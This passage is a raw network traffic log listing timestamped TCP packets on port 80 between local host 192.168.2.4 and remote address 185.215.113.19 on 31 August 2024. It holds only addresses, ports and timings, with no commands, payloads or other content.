Aug 31, 2024 22:41:57.379050016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379076004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379087925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379113913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379151106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379151106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379179955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379192114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379215956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379235983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379255056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379275084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379287004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379308939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379331112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379349947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379358053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379384041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379410982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379421949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379446030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379467010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379484892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379503965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379523993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379539967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379560947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379574060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379597902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379612923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379636049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379651070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379674911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379697084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379713058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379736900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379756927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379776001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379791975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379812956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379831076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379846096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379868984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379884958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379904985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379925013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379946947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379961967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.379986048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380007029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380022049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380042076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380068064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380085945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380103111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380119085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380139112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380152941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380179882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380192041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380213976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380233049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380247116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380268097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380294085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380309105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380332947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380353928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380376101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380398035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380415916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380428076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380450964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380469084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380486965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380501986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380523920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380539894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380563021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380584002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380601883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380616903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380637884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380661964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380681992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380702972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380712032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380734921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380754948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380772114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380789042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380809069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380822897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380846977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380867004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380887032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380909920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380932093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380944967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380964041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.380980015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381000042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381015062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381036997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381052017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381072044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381093979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381104946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381131887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381153107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381175041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381191969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381206989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381227970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381251097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381269932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381283998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381304026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381324053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381337881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381355047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381380081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381398916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381417036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381444931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381460905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381480932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381498098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381517887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381539106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381550074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381572962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381593943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381613016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381628036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381645918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381664991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381690979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381704092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381728888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381742954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381766081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381781101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381803989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381819010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381836891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381859064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381876945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381901979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381913900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381936073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381968975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.381994009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382015944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382016897 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382031918 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382034063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382042885 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382047892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382054090 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382064104 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382071018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382075071 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382088900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382097006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382100105 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382111073 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382116079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382121086 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382132053 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382132053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382143021 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382149935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382153034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382164001 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382169008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382174969 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382185936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382189989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382195950 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382206917 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382208109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382217884 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382224083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382229090 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382240057 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382245064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382250071 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382260084 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382265091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382271051 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382281065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382287979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382292986 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382308006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382316113 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382328033 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382338047 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382349014 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382353067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382359028 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382368088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382370949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382380962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382389069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382391930 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382401943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382406950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382412910 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382424116 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382425070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382435083 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382445097 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382455111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382455111 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382463932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382466078 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382477999 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382484913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382488012 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382498980 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382507086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382509947 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382520914 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382524014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382533073 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382544041 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382546902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382554054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382565022 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382567883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382575989 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382589102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382591963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382600069 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382611036 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382613897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382622004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382628918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382632017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382642984 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382648945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382653952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382664919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382667065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382674932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382685900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382697105 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382698059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382707119 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382718086 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382720947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382729053 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382733107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382739067 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382750034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382757902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382761955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382769108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382772923 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382782936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382786036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382793903 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382805109 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382813931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382816076 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382827997 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382838011 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382842064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382849932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382860899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382863998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382874012 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382879019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382894039 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382899046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382905960 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382915974 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382920980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382926941 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382939100 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382942915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382949114 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382956028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382960081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382971048 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.382977009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.382997036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383017063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383035898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383053064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383065939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383084059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383105993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383121967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383142948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383164883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383184910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383203030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383220911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383243084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383263111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383281946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383300066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383318901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383332968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383358955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383371115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383397102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383419037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383440018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383454084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383476973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383497000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383519888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383537054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383558035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383573055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383595943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383611917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383630037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383646011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383677006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383687019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383709908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383723021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383747101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383766890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383785963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383801937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383825064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383840084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.383857012 CEST	49732	80	192.168.2.4	185.215.113.19
